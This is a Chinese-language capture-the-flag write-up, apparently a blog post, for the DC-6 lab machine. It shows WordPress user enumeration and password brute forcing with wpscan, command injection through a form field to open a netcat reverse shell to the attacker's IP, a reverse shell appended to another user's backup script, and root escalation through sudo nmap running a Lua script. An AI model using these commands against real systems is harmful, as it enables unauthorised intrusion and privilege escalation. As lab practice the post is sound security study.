主机DC-6

主机DC-6

扫描端口和IP

添加hosts文件

成功访问

查看网站信息

存在漏洞:!!!

扫描目录发现有admin登录入口

想着爆破一下 ,由于系统是wordpress,用wpscan

先用cewl生成一下密码本

cewl http://wordy/ > 2.txt

wpscan --url http://wordy --enumerate u

wpscan --url http://wordy --passwords 2.txt

没有找到!

用kali自带的密码本:

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

wpscan --url http://wordy --passwords passwords.txt

登录:

在网上搜索wordpress 5.1.1有远程代码执行rce漏洞,找到在这里

反弹shell

127.0.0.1 | nc -e /bin/bash 192.168.222.129 9998

输入框大小有限制,注意改一下!!!

右键--检查---改一下输入框长度大小

反弹成功:

导入终端

python -c "import pty;pty.spawn('/bin/bash')"

查找特殊权限文件

find / -perm -u=s -type f 2>/dev/null

没有什么文件可以利用

扫描端口是时候还有一个ssh没有用:

利用一下,找其他用户信息

查看信息的时候不要使用ls 用ls -al(包含查看隐藏文件)

cd /home

在mark家目录的stuff文件夹中的txt文件中找到了疑似账号密码

试一下ssh登录graham

ssh graham@192.168.222.134

登录成功

sudo -l 列出当前用户被授权可执行的sudo命令

发现一个jens可执行权限的脚本?

什么意思?要登录jens???,利用一下

echo "nc -e /bin/bash 192.168.222.129 8889" >> /home/jens/backups.sh

注意切换到/home/jens/目录下执行

执行:sudo -u jens ./backups.sh 一定要以jens身份运行

反弹成功!!!切换到jens

sudo -l查看当前用户被授权可执行的 sudo 命令列表

有nmap命令,利用提权:

sudo -l,查看可以执行管理员权限命令

touch root_shell.sh

echo 'os.execute("/bin/sh")' > root_shell.sh

  • os.execute() 是 Lua 的系统执行函数,作用是调用操作系统的命令

sudo nmap --script=root_shell.sh

  • 借助sudo授权的nmap程序(root 权限),执行自定义 Lua 脚本,一键获取 root 权限的 shell 终端

posted @ 2025-12-31 10:42  知足常福  阅读(0)  评论(0)    收藏  举报